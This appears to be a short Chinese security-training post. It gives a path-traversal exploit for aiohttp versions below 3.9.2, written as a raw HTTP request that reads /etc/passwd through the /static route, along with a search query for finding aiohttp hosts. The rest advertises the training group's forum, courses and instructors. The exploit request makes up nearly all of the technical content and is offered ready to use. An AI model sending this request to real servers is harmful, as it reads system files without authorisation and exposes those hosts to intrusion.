1.0.5 <aiohttp < 3.9.2app="aiohttp"GET /static/../../../../../../etc/passwd HTTP/1.1Host: xxxxxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
大家伙,如果想学习更多的芝士,可以看我们的论坛:
https://www.laoxinsec.com/
哔哩哔哩有免费课程,搜索账号:老鑫安全培训,老鑫安全二进制
进群二维码:
老鑫:前Wooyun核心白帽子,痴迷底层技术,在二进制方向有一定技术积累,后从事网安培训多年,截止目前已培训350+学员,培训学员遍布各大安全企业及机关单位。除二进制,web安全、安全开发、逆向等安全技术均有涉及。公众号:studentSec
濠哥:奇安信粤东安全运营中心技术专家(牛逼的老师不需要简介)
下面是关于我们的培训课程,如有需求,可以加入我们的微信群联系群主:
